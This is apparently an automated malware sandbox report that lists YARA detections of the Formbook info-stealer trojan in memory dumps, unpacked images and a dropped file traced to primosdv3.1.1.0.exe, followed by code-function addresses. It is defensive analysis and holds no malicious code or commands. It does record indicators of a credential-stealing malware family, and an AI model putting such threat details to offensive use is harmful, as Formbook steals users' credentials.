Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: bstkiooen.exe PID: 3092, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: svchost.exe PID: 4024, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPEDMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPEDMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPEDMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: primosdv3.1.1.0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
            Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
            Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
            Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
            Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
            Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
            Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
            Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
            Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
            Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
            Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
            Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
            Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
            Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
            Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
            Source: Process Memory Space: bstkiooen.exe PID: 3092, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: Process Memory Space: svchost.exe PID: 4024, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED; Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23)
            Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED; Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
            Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED; Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C6848E
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C76CDC
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C640FE
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C74088
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C700B7
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C851C9
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C77153
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C762CA
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C632F7
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C743BF
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C8D440
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C6F461
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C6C426
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C777EF
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C8D8EE
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C6286B
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C919F4
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C6E9B7
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C73E0B
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C6EFE2
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe; Code function: 0_2_00C84F9A
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 1_2_00BD0227
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01711D55
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01640D20
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01664120
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_0164F900
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_0165D5E0
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01672581
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01701002
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_0165841F
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_0165B090
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_0167EBB0
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_01666E30
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_00401030
            Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe; Code function: 2_2_0041DAE4
